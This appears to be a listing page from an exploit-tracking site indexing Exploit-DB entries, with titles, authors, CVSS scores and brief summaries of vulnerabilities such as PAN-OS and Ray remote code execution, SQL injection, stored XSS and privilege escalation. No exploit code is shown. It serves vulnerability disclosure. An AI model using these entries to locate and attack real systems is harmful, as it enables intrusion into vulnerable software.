Exploitdb Exploits
31,341 exploits tracked across all sources.
Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution
by Milad karimi
Laravel Framework <11 - Info Disclosure
An issue in Laravel Framework 8 through 11 might allow a remote attacker to discover database credentials in storage/logs/laravel.log. NOTE: this is disputed by multiple third parties because the owner of a Laravel Framework installation can choose to have debugging logs, but needs to set the access control appropriately for the type of data that may be logged.
by Huseein Amer
Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution
A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
by Kr0ff
CVSS 10.0
Savsoft Quiz 6.0 - XSS
Savsoft Quiz 6.0 allows stored XSS via the index.php/quiz/insert_quiz/ quiz_name parameter.
by Eren Sen
CVSS 6.1
Phpgurukul Online Fire Reporting System - SQL Injection
A SQL Injection vulnerability exists in the `ofrs/admin/index.php` script of PHPGurukul Online Fire Reporting System 1.2. The vulnerability allows attackers to bypass authentication and gain unauthorized access by injecting SQL commands into the username input field during the login process.
by Diyar Saadi
CVSS 9.1
Terratec DMX_6Fire USB <1.23.0.02 - Privilege Escalation
An unquoted service path vulnerability in Terratec DMX_6Fire USB v.1.23.0.02 allows a local attacker to escalate privileges via the Program.exe component.
by Joseph Kwabena Fiagbor
CVSS 6.7
Ray <2.8.1 - Command Injection
A command injection existed in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication. The issue is fixed in version 2.8.1+. Ray maintainers' response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023
by Fire_Wolf
CVSS 9.8
Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)
by Erdemstar
Wordpress Plugin Playlist for Youtube 1.32 - Stored Cross-Site Scripting (XSS)
by Erdemstar
WBCE CMS Version 1.6.1 - Remote Command Execution (Authenticated)
by tmrswrr
openeclass <3.15 - RCE
File Upload vulnerability in openeclass v.3.15 and before allows an attacker to execute arbitrary code via a crafted file to the certbadge.php endpoint.
by George Tsimpidas
CVSS 9.8
MinIO - Privilege Escalation
MinIO is a High Performance Object Storage. When someone creates an access key, it inherits the permissions of the parent key. Not only for `s3:*` actions, but also `admin:*` actions. Which means unless somewhere above in the access-key hierarchy, the `admin` rights are denied, access keys will be able to simply override their own `s3` permissions to something more permissive. The vulnerability is fixed in RELEASE.2024-01-31T20-20-33Z.
by Jenson Zhao
CVSS 8.8
AnyDesk 7.0.15,9.0.1 - Code Injection
AnyDesk 7.0.15 and 9.0.1 contains an unquoted service path vulnerability that allows local non-privileged users to potentially execute code with elevated SYSTEM privileges. Attackers can exploit the unquoted service path configuration to inject malicious executables that will be run with high-level system permissions.
by Milad karimi
Human Resource Management System v1.0 - Multiple SQLi
by nu11secur1ty
Best Student Result Management System v1.0 - Multiple SQLi
by nu11secur1ty
Eset Endpoint Antivirus < 8.1.2062.0 - Improper Privilege Management
Local privilege escalation vulnerability potentially allowed an attacker to misuse ESET’s file operations to delete files without having proper permission.
by Milad karimi
CVSS 7.8
Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS)
by Erdemstar
Computer Laboratory Management System v1.0 - Multiple-SQLi
by nu11secur1ty
OpenCart Core 4.0.2.3 SQL Injection via search Parameter
OpenCart Core 4.0.2.3 contains a SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'search' parameter. Attackers can send GET requests to the product search endpoint with malicious 'search' values to extract sensitive database information using boolean-based blind or time-based blind SQL injection techniques.
by Saud Alenazi
CVSS 8.2
By Source